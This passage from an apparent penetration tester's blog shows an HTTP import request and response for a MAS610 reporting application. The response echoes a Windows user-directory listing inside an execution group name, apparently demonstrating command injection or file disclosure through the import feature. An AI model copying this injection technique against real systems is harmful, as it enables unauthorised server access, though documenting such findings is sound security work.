S","formName":"MAS610_K","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":36},{"configPrefix":"MAS","formName":"MAS610_L","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":38},{"configPrefix":"MAS","formName":"MAS610_M","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":40}]}</content>
</item>
<item>
<name>Retrieve R610</name>
<description>Retrieve R610 Reports</description>
<content>{"configPrefix":"MAS","name":"Retrieve R610","description":"Retrieve R610 Reports","abortOnFailure":true,"batchRunJobs":[],"computeJobs":[{"formName":"MAS610_B1_B2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":0},{"formName":"MAS610_B3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":1},{"formName":"MAS610_C1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":2},{"formName":"MAS610_D1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":3},{"formName":"MAS610_D2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":4},{"formName":"MAS610_D3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":5},{"formName":"MAS610_D4","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":6},{"formName":"MAS610_D5","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":7},{"formName":"MAS610_E1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":8},{"formName":"MAS610_E2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":9},{"formName":"MAS610_E3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":10},{"formName":"MAS610_F","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":11},{"formName":"MAS610_G","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":12},{"formName":"MAS610_H","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":13},{"formName":"MAS610_I","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":14},{"formName":"MAS610_J","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":15},{"formName":"MAS610_K","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":16},{"formName":"MAS610_L","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":17},{"formName":"MAS610_M","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":18}]}</content>
</item>
</ExecutionGroupDto>

-----------------------------22114693211599442001093007703–

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2022 20:54:39 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Expires: 0
CACHE-CONTROL: NO-CACHE
CACHE-CONTROL: no-cache, no-store, must-revalidate
CACHE-CONTROL: no-cache
X-XSS-Protection: 1; mode=block
PRAGMA: NO-CACHE
PRAGMA: no-cache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Length: 9977

<?xml version=’1.0’ encoding=’UTF-8’?>
<partial-response><changes><update id="importFileForm:messages"><![CDATA[<div id="importFileForm:messages" class="ui-messages ui-widget" aria-live="polite"></div>]]></update><update id="importFileForm:listuploadedFileName"><![CDATA[<span id="importFileForm:listuploadedFileName"></span>]]></update><update id="importFileForm:ImportInfoTable"><![CDATA[<div id="importFileForm:ImportInfoTable" class="ui-datatable ui-widget ui-datatable-scrollable borderless headerClass tableFixClass" style="width:800px;"><div class="ui-widget-header ui-datatable-scrollable-header"><div class="ui-datatable-scrollable-header-box"><table role="grid"><thead id="importFileForm:ImportInfoTable_head"><tr role="row"><th id="importFileForm:ImportInfoTable:j_idt348" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="level" scope="col" style="width:5%"><span class="ui-column-title">level</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt350" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="Type" scope="col" style="width:15%"><span class="ui-column-title">Type</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt352" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="action" scope="col" style="width:5%"><span class="ui-column-title">action</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt354" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="Content" scope="col" style="width:75%"><span class="ui-column-title">Content</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th></tr></thead></table></div></div><div class="ui-datatable-scrollable-body" tabindex="-1"><table role="grid"><tbody id="importFileForm:ImportInfoTable_data" class="ui-datatable-data ui-widget-content"><tr data-ri="0" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">WARN</td><td role="gridcell" class="">Execution Group</td><td role="gridcell" class="">REMOVE</td><td role="gridcell" class="">Execution Group (Computeeeee & Retrieve R610) not in source file</td></tr><tr data-ri="1" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Group</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Group (Computeeeee

.NET v4.5
.NET v4.5 Classic
All Users
Default
Default User
desktop.ini
Public
… some user folders are removed by tester …
& Retrieve R610)</td></tr><tr data-ri="2" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_B1_B2|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="3" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_B3|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="4" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_C1|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="5" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D1|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="6" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D2|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="7" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D3|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="8" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D4|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="9" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D5|1, Translate: false,Preserve adjustment: false)</td></tr></tbody></table></div><div class="ui-widget-header ui-datatable-scrollable-footer"><div class="ui-datatable-scrollable-footer-box"><table role="grid"></table></div></div><div id="importFileForm:ImportInfoTable_paginator_bottom" class="ui-paginator ui-paginator-bottom ui-widget-header ui-corner-bottom" role="navigation" aria-label="Pagination"><a href="#" class="ui-paginator-first ui-state-default ui-corner-all ui-state-disabled" aria-label="First Page" tabindex="-1"><span class="ui-icon ui-icon-seek-first">F</span></a><a href="#" class="ui-paginator-prev ui-state-default ui-corner-all ui-state-disabled" aria-label="Previous Page" tabindex="-1"><span class="ui-icon ui-icon-seek-prev">P</span></a><span class="ui-paginator-pages"><a class="ui-paginator-page ui-state-default ui-state-active ui-corner-all" tabindex="0" href="#">1</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">2</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">3</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">4</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">5</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">6</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">7</a></span><a href="#" class="ui-paginator-next ui-state-default ui-corner-all" aria-label="Next Page" tabindex="0"><span class="ui-icon ui-icon-seek-next">N</span></a><a href="#" class="ui-paginator-last ui-state-default ui-corner-all" aria-label="Last Page" tabindex="0"><span class="ui-icon ui-icon-seek-end">E</span></a><label id="importFileForm:ImportInfoTable:j_id268_rppLabel" for="importFileForm:ImportInfoTable:j_id268" class="ui-paginator-rpp-label ui-helper-hidden">Rows Per Page</label><select id="importFileForm:ImportInfoTable:j_id268" name="importFileForm:ImportInfoTable_rppDD" aria-labelledby="importFileForm:ImportInfoTable:j_id268_rppLabel" class="ui-paginator-rpp-options ui-widget ui-state-default ui-corner-left" autocomplete="off"><option value="5">5</option><option value="10" selected="selected">10</option><option value="20">20</option></select></div><input type="hidden" id="importFileForm:ImportInfoTable_scrollState" name="importFileForm:ImportInfoTable_scrollState" autocomplete="off" value="0,0" /></div><script id="importFileForm:ImportInfoTable_s" type="text/javascript">PrimeFaces.cw(“DataTable","ImportInfoTableVar",{id:"importFileForm:ImportInfoTable",paginator:{id:[‘importFileForm:ImportInfoTable_paginator_bottom’],rows:10,rowCount:64,page:0,currentPageTemplate:’({currentPage} of {totalPages})',pageLinks:20},scrollable:true,liveScroll:false,scrollStep:0,scrollLimit:64,liveScrollBuffer:0,virtualScroll:false,touchable:false,sorting:true,multiSort:true,sortMetaOrder:[‘’],groupColumnIndexes:[],disableContextMenuIfEmpty:false});</script>]]></update><update id="importFileForm:listimportBtn"><![CDATA[<button id="importFileForm:listimportBtn” name="importFileForm:listimportBtn" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only btn-blue-darken" onclick="PrimeFaces.ab({s:"importFileForm:listimportBtn",f:"importFileForm",u:"growl importFileForm executionGroupsForm executionItemsForm",onco:function(xhr,status,args,data){importNewHandleComplete(xhr, status, args); ;}});return false;" style="margin-right:10px;" type="submit"><span class="ui-button-text ui-c">Import</span></button><script id="importFileForm:listimportBtn_s" type="text/javascript">PrimeFaces.cw("CommandButton","widget_importFileForm_listimportBtn",{id:"importFileForm:listimportBtn"});</script>]]></update><update id="j_id1:javax.faces.ViewState:0"><![CDATA[-1207254338988663714:6479361099775717792]]></update><update id="j_id1:javax.faces.ClientWindow:0"><![CDATA[-3091]]></update><eval><![CDATA[resetSessionTimer();]]></eval></changes></partial-response>

Leave a Reply.

**Crashpark
**

Junior penetration tester.

Archives

June 2022

Categories

All

RSS Feed

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE